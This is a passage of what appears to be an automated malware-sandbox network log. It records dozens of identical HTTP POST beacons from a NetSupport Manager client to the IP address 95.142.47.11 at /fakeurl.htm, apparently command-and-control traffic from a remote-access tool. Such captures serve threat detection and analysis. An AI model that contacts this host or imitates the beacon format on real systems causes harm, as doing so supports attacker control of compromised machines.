                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.625889063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.726054907 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.826719046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.926698923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.026802063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.126837015 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.227710009 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.328880072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.429678917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.529670954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.629929066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.730746031 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.830743074 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:02.931751966 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.031929970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.132925987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.236440897 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.335927010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.436769962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.537733078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.639102936 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.742677927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.843770981 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:03.943939924 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.044941902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.146017075 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.246809959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.346924067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.446899891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.547714949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.647948980 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.748754978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.848921061 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:04.949706078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.049916029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.150758028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.251682043 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.351950884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.452897072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.554047108 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.654690027 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.755675077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.855658054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:05.958151102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.058679104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.158668041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.259007931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.359703064 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.459690094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.559963942 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.660702944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.760711908 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.861696959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:06.961683989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.061701059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.162703991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.262782097 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.363955975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.463887930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.564672947 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.664910078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.764992952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.864959955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:07.966130972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.066724062 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.166712046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.266937017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.367835999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.468102932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.567738056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.668811083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
